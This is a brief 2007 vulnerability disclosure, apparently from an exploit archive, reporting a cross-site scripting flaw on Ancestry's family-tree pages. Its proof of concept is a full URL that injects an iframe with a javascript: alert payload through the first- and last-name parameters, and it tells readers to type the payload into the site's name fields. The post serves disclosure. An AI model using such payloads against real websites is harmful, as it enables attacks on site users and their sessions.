Home / os / solaris

ancestry-xss.txt

Posted on 21 December 2007

# Title : Ancestry XSS vuln # Description : The Ancestry site is vulnerable to XSS # Author : Tosser # E-mail : ht7015@gmail.com # Proof : http://trees.ancestry.com/pt/StartPed.aspx?URL=pt%2fStartPed.aspx&fn=%3ciframe+src%3d%22javascript%3aalert('XSS')%22%3e&ln=%3c%2fiframe%3e&gen=M&o_iid=30263&o_lid=30263&offerid=0%3a7858%3a0 or go to http://www.ancestry.com/ and enter the XSS code in the "Your First Name" and "Your Last Name" fields.

 

TOP